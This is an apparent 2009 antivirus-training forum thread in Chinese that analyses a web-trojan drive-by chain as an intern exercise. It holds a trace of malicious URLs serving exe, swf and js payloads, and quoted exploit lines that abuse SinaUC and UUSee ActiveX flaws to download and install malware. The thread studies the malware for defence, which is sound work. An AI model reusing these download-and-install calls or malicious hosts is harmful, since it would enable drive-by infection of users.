网马解密练习（十五）答案 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛综合娱乐区 活动专区 实习生专区 实习生交流区网马解密练习（十五）答案

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		请移步新论坛反馈问题或参与讨论		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[练习] 网马解密练习（十五）答案

本主题由版主 networkedition 于 2009-8-13 17:02:58 执行设置高亮操作

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-08-13 17:02 \| 只看楼主短消息资料字号：小中大 1楼网马解密练习（十五）答案 Log is generated by FreShow. [wide]http://kf.shangdu.com/news/moshou/?35288 [script]http://js.azzwg.cn/down/downwow/ads1.js [frame]http://dl.azzwg.cn/down/downwow/ui.htm [frame]http://30mm.azzwg.cn/ms/mm.htm [script]http://30mm.azzwg.cn/ms/014.js [object]http://30mm.azzwg.cn/ms/014.exe [frame]http://30mm.azzwg.cn/ms/m09002.htm [script]http://30mm.azzwg.cn/ms/m09002.js [object]http://boyuo.cn/ms/m09002.css [frame]http://30mm.azzwg.cn/ms/lzn.htm [object]http://boyuo.cn/ms/lzn.exe [frame]http://30mm.azzwg.cn/ms/ff/flash.asp?id='+Flashver+' [object]http://30mm.azzwg.cn/cb/ff/GG28.swf [object]http://boyuo.cn/cb/ff/flash.exe [script]http://30mm.azzwg.cn/ms/real.js [object]http://boyuo.cn/ms/real.exe [frame]http://30mm.azzwg.cn/ms/realn.htm [object]http://boyuo.cn/ms/ren.exe [frame]http://30mm.azzwg.cn/ms/bfn.htm [script]http://30mm.azzwg.cn/ms/bfn.js [object]http://boyuo.cn/ms/bfn.exe [frame]http://ad.xyqobai198.cn/ad/ [script]http://js.users.51.la/461930.js [script]http://kf.shangdu.com/news/moshou/ui.js 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	分享到：

QoS 卡卡反病毒小组帖子:530 注册: 2009-06-06 来自:	发表于： 2009-08-13 17:39 \| 短消息资料字号：小中大 2楼回复: 网马解密练习（十五）答案 swf 怎么下载不来了呢？附件: 您所在的用户组无法下载或查看附件 SReng工具下载 SRENG工具使用说明费尔删除工具
QoS 卡卡反病毒小组帖子:530 注册: 2009-06-06 来自:

merrk_chuan 飘泊而立狮帖子:845 注册: 2009-06-07 来自:	发表于： 2009-08-13 19:06 \| 短消息资料字号：小中大 3楼回复 2F QoS 的帖子最终的swf不是gg.swf，仔细看下mm.htm 那个网页的源码，这个swf的和老师的教程里提到的是一样的
merrk_chuan 飘泊而立狮帖子:845 注册: 2009-06-07 来自:

Lighting_Cui 自信弱冠狮帖子:391 注册: 2009-06-10 来自:火星	发表于： 2009-08-13 21:07 \| 短消息资料字号：小中大 4楼回复：网马解密练习（十五）答案看来是露看了教程。。。寻找中
Lighting_Cui 自信弱冠狮帖子:391 注册: 2009-06-10 来自:火星

基牛强壮不惑狮帖子:841 注册: 2009-06-19 来自:	发表于： 2009-08-14 03:25 \| 短消息资料字号：小中大 5楼回复：网马解密练习（十五）答案老师，对于这个木马怎么看 [frame]http://30mm.azzwg.cn/ms/mm.htm [object]http://30mm.azzwg.cn/ms/sina.exe [object]http://30mm.azzwg.cn/ms/UU.ini 这两个是mm.htm这个网页中，“var myurl="http://30mm.azzwg.cn/ms/";” Sina["DownloadAndInstall"](myurl+"sina.exe") firewallholdup.ini我下载下来，里面是http://30mm.azzwg.cn/ms/UUSee.CAB这个地址，又下载，似乎是uuSEE的安装程序 storm["Update"]("\Program Files\Common Files\uusee\" ,myurl+"UU.ini","",1) 他们会构成威胁吗
基牛强壮不惑狮帖子:841 注册: 2009-06-19 来自:

QoS 卡卡反病毒小组帖子:530 注册: 2009-06-06 来自:	发表于： 2009-08-14 10:06 \| 短消息资料字号：小中大 6楼回复 3F merrk_chuan 的帖子谢谢，同学提醒！知道！！ SReng工具下载 SRENG工具使用说明费尔删除工具
QoS 卡卡反病毒小组帖子:530 注册: 2009-06-06 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-08-14 10:55 \| 只看楼主短消息资料字号：小中大 7楼回复 2F QoS 的帖子你的这个问题我给你回复了，在练习的那篇帖子里。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2009-08-14 11:05 \| 只看楼主短消息资料字号：小中大 8楼回复 5F 基牛的帖子不错，很好，看得很仔细。那两个的确也是网马，sina.exe是利用到sinauc的漏洞可通过clsid：78ABDC59-D8E7-44D3-9A76-9A0918C52B4A来判断漏洞类型，另外uusee.cab也是病毒，瑞星10版报：Trojan.Win32.Nodef.ibv，clsid:2CACD7BB-1-6E83F82C813B-1C59-4BBB-8E8 uusee网络电视漏洞。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT